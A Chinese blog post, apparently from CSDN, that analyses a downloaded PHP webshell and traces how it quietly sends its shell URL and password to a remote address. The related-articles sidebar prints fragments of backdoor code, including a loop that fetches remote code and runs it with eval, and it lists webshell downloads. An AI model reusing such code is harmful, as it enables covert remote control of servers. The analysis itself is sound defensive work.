某php大马后门分析

最新推荐文章于 2021-07-06 10:59:37 发布
最新推荐文章于 2021-07-06 10:59:37 发布
阅读量293 收藏
点赞数
分类专栏: 代码审计 文章标签: php 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/win176489/article/details/115353318
版权

某php大马后门分析

分析一下手里的一个php大马,网上找的
源码是这样的
在这里插入图片描述登陆后界面还是比较屌的
在这里插入图片描述

在这里插入图片描述
直接上echo 打印出这些关键变量
代码如下
在这里插入图片描述在这里插入图片描述
输出后发现一个http的地址,还有一个危险函数file_get_contents
官方的文档如下
在这里插入图片描述再继续看原来的代码
在这里插入图片描述再次打印出 e 和 e和 ed的值
在这里插入图片描述
在这里插入图片描述
这里的思路已经明朗了,它这里会请求链接的gif图片,然后通过file_get_contents函数将内容赋值给$_SESSION[‘PhpCode’]
通过迅雷下载gif图片,文件内容是如下乱码
在这里插入图片描述
继续查看原代码
在这里插入图片描述打印变量a的值
在这里插入图片描述
在这里插入图片描述gzinflate是解压函数,将代码解压出来打印
在这里插入图片描述
接着分析得到的php代码,在2380行找到一串字符
在这里插入图片描述
base64解密得到一个地址
在这里插入图片描述
再分析变量url,总共含 变量,copyurl为上面的url地址,再定位其他两个变量
在这里插入图片描述
分别为开始的常量shell地址和密码字段
大马的后门就找到了。。。

刺 心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php包含大马执行,对于某个PHP大马分析
weixin_40008135的博客
03-09 177
阅读: 87 但是代码量却非常少: 不由得非常好奇它是如何用这么少的代码实现这么丰富的功能的。于是将它的 html 内容打印一下: 发现它的内容是gz压缩后再base64加密的: 于是反向执行一下,得到原始内容:error_reporting(0);session_start();if (!isset($_SESSION["phpapi"])) {$c = '';$useragent = 'Mo...
一句话木马针对的不同框架使用_php大马小马什么区别,太香了
最新发布
2401_83947048的博客
04-19 773
webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。webshell根据功能也分为大马、小马和一句话木马,例如:通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等。
实战分析PHP大马隐藏后门——案例二
W小哥
07-06 1686
一、PHP大马准备 PHP大马,示例如图所示 二、分析过程 第一步: 查看 php 大马的源码,惊奇的发现这代码也太少了吧,而且登录大马之后的功能还很多,代码这么少肯定有问题。 更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频 4、应急响应真实案例复现靶场与应急响应教程 收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥 ...
html大马源码,php大马源码:【百家号】脸书百科,分析 PHP大马-php_mof SHELL Web程序...
weixin_34163588的博客
06-18 844
$password=‘phpinfo‘;//登录密码//----------功能程序------------------//$c="chr";session_start();if (empty($_SESSION[‘PhpCode‘])) {$url=$c(104).$c(116).$c(116).$c(112).$c(58);$url .=$c(47).$c(47).$c(119).$c(119...
php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
PHP加密无后门大马
07-26
PHP加密无后门大马】是一个针对PHP代码的安全措施,旨在保护源代码不被轻易查看、修改或窃取。在互联网环境中,源代码的安全至关重要,尤其是对于包含敏感信息或功能强大的应用程序而言。PHP shellcode通常指的是...
php大马 webshell.zip 去后门 可能报毒
04-21
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。 解压密码:php
sql_大马_sql_脱裤_php大马下载_php大马_
10-01
标题中的"sql_大马_sql_脱裤_php大马下载_php大马_"表明这是一个与SQL注入和PHP后门(常被称为“大马”)相关的主题。在这个领域,我们讨论的是网络安全,特别是针对Web应用程序的攻击手段。让我们深入探讨这些概念...
PHP大马-php_mof SHELL.rar
11-17
nc反弹还需要再测试 PHP大马-php_mof SHELL.rar
PHP大马
12-24
php 木马的分析(加密破解) - 分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,
aether_upload.7z
02-06
php文件上传框架,基于laravel
【猥琐流】制作一个隐藏在黑页下的大马并且添加后门
大方子
09-02 2394
00×01 内容概要 Part 1:隐藏在黑页下的大马 #(One) Part 2:隐藏在404下的大马 Part 3:插入后门并且写入收信api.php 00×02 (Start) 试问,在一个华丽的php文件下面你可有想过是一个邪恶的php大马呢? So,让我们开始手动制作,首先我们需要了解php中的curl函数。Curl函数能实现的功能分别有: 实现远程获取和采集内容 实...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2848
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1131
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
php大马程序_php大马是什么
weixin_35406877的博客
03-08 961
大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 (推荐学习:PHP视频教程)...
php源码扫描后门工具
01-23
这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值